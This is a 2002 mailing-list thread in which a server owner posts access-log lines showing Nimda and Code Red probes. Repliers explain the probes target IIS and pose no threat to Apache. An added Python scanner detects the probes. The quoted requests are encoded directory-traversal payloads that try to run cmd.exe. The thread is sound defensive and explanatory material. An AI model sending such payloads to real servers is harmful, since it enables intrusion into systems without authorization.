I found this in my httpd access log:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
Did someone try to break into my system?
-- STH
On Wednesday 18 September 2002 00.13, Steven T. Hatton wrote:
Did someone try to break into my system?
Yep. Read this
http://www.cert.org/advisories/CA-2001-26.html
The Nimda worm's greatest impact on an Apache server is bigger log files, so you don't have to worry too much about it.
//Anders
On Tuesday 17 September 2002 18:16, Anders Johansson wrote:
On Wednesday 18 September 2002 00.13, Steven T. Hatton wrote:
Did someone try to break into my system?
Yep. Read this
http://www.cert.org/advisories/CA-2001-26.html
The Nimda worm's greatest impact on an Apache server is bigger log files, so you don't have to worry too much about it.
//Anders
Thanks. I got hit by a few of these as well:
http://www.cert.org/advisories/CA-2001-19.html
I've only had the bloody server up for 20 hours! And it doesn't even have a DNS entry.
-- STH
On Tue, 17 Sep 2002, Steven T. Hatton wrote:
I found this in my httpd access log:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
[snip]
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
Did someone try to break into my system?
Yes, it IS an attempt to break in, but to a Windows NT or IIS server, and it is from an infected Windows server, not a rootkit-type exploit. Apache is not vulnerable to these attacks, known as "code red" -- there may be other names for it as well; by now there may be variants of the original worm.
Jim
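The probes quoted in this thread hide the same `..\..\winnt\system32\cmd.exe` traversal behind several encodings (double percent-encoding such as `%255c`, malformed `%%35c`, and overlong UTF-8 such as `%c0%af`). The following log scanner is an added example, not code from any poster on this thread: it normalizes each request path until the encodings collapse, flags cmd.exe/root.exe probes, and records whether the server actually served anything (on Apache, as Anders and Jim note, these should all be 4xx). The sample log lines are constructed from the entries quoted above.

```python
import re
from urllib.parse import unquote

# Constructed sample, patterned on the access-log entries quoted in this thread.
SAMPLE_LOG = """\
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /index.html HTTP/1.0" 200 1024
"""

# Overlong UTF-8 forms of '/' and '\' from the thread's log. A strict decoder
# rejects them, so fold them to ASCII before percent-decoding.
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%9c": "\\", "%c1%1c": "\\"}
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
TARGET = re.compile(r"(cmd|root)\.exe")
TRAVERSAL = re.compile(r"(^|/)\.\./")

def normalize_path(raw: str) -> str:
    """Fold overlong UTF-8 and percent-decode until stable, so that
    ..%255c.., ..%%35c.. and ..%c0%af.. all collapse to ../.."""
    path = raw.lower()
    for _ in range(4):  # bounded; the probes here nest at most two layers
        for seq, char in OVERLONG.items():
            path = path.replace(seq, char)
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def classify(line: str):
    """Return a finding for a cmd.exe/root.exe probe, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    raw, status = m.group(1), int(m.group(2))
    path = normalize_path(raw)
    if not TARGET.search(path):
        return None
    return {"raw": raw, "normalized": path,
            "technique": "traversal" if TRAVERSAL.search(path) else "direct",
            "served": status < 400}  # a 2xx/3xx here would warrant a look

def scan(log_text: str) -> list:
    """Findings for every probe line; on Apache you expect served=False."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Running `scan(SAMPLE_LOG)` yields four findings, all with `served=False`; the three encoded variants normalize to the identical `/scripts/../../winnt/system32/cmd.exe?/c+dir`, which is what makes them easy to group in a report.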